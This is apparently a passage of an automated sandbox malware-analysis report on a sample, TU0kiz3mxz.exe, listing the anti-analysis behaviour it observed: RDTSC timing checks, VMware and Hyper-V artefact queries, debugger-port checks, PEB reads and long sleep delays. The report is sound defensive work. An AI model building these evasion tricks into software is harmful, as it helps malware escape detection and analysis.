          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTR
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 2959904 second address: 295990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 2959B6E second address: 2959B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 2420000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 2650000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 2480000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 8710000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 9710000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: 9910000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Memory allocated: A910000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_00409AA0 rdtsc 3_2_00409AA0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5331
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4615
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 873
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 3121
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 6851
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8612
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 381
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 788
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 756
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-13957
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\explorer.exe API coverage: 2.2 %
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe TID: 2676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2132 Thread sleep count: 5331 > 30
Source: C:\Windows\explorer.exe TID: 2132 Thread sleep time: -10662000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2132 Thread sleep count: 4615 > 30
Source: C:\Windows\explorer.exe TID: 2132 Thread sleep time: -9230000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5820 Thread sleep count: 3121 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5820 Thread sleep time: -6242000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5820 Thread sleep count: 6851 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5820 Thread sleep time: -13702000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6540 Thread sleep time: -17224000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6540 Thread sleep time: -762000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000004.00000000.1713435534.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000000.1707105236.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000006
Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.000000000978C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2699789410.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700813787.000000000978C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWJq
Source: explorer.exe, 0000000F.00000003.2966717817.000000000CBB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@
Source: explorer.exe, 0000000F.00000003.2966717817.000000000CBB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: explorer.exe, 0000000F.00000002.4176411814.000000000CA05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\>
Source: explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: TU0kiz3mxz.exe, 00000000.00000002.1710158521.0000000007000000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: TyGc8VmCIO
Source: explorer.exe, 0000000F.00000002.4159088871.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWare
Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000000F.00000003.2765565439.000000000CDF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}x
Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.2630983803.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000004.00000000.1712729060.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000F.00000003.3928151394.000000000CAB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_00409AA0 rdtsc 3_2_00409AA0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0040ACE0 LdrLoadDll, 3_2_0040ACE0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_004A79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_004A79E1
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01180115 mov eax, dword ptr fs:[00000030h] 3_2_01180115
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116A118 mov ecx, dword ptr fs:[00000030h] 3_2_0116A118
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h] 3_2_0116A118
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h] 3_2_0116A118
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h] 3_2_0116A118
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h] 3_2_0116E10E
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010F0124 mov eax, dword ptr fs:[00000030h] 3_2_010F0124
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01158158 mov eax, dword ptr fs:[00000030h] 3_2_01158158
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01154144 mov eax, dword ptr fs:[00000030h] 3_2_01154144
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01154144 mov eax, dword ptr fs:[00000030h] 3_2_01154144
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01154144 mov ecx, dword ptr fs:[00000030h] 3_2_01154144
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01154144 mov eax, dword ptr fs:[00000030h] 3_2_01154144
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01154144 mov eax, dword ptr fs:[00000030h] 3_2_01154144
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h] 3_2_010C6154
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h] 3_2_010C6154
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010BC156 mov eax, dword ptr fs:[00000030h] 3_2_010BC156
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0114019F mov eax, dword ptr fs:[00000030h] 3_2_0114019F
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0114019F mov eax, dword ptr fs:[00000030h] 3_2_0114019F
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0114019F mov eax, dword ptr fs:[00000030h] 3_2_0114019F
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0114019F mov eax, dword ptr fs:[00000030h] 3_2_0114019F
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01100185 mov eax, dword ptr fs:[00000030h] 3_2_01100185
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01164180 mov eax, dword ptr fs:[00000030h] 3_2_01164180
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_01164180 mov eax, dword ptr fs:[00000030h] 3_2_01164180
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h] 3_2_010BA197
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h] 3_2_010BA197
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h] 3_2_010BA197
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h] 3_2_0117C188
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h] 3_2_0117C188
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0113E1D0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0113E1D0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0113E1D0 mov ecx, dword ptr fs:[00000030h] 3_2_0113E1D0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0113E1D0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0113E1D0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h] 3_2_011861C3
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h] 3_2_011861C3
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe Code function: 3_2_010F01F8 mov eax, dword ptr fs:[00000030h] 3_2_010F01F8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011961E5 mov eax, dword ptr fs:[00000030h]3_2_011961E5
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01144000 mov ecx, dword ptr fs:[00000030h]3_2_01144000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
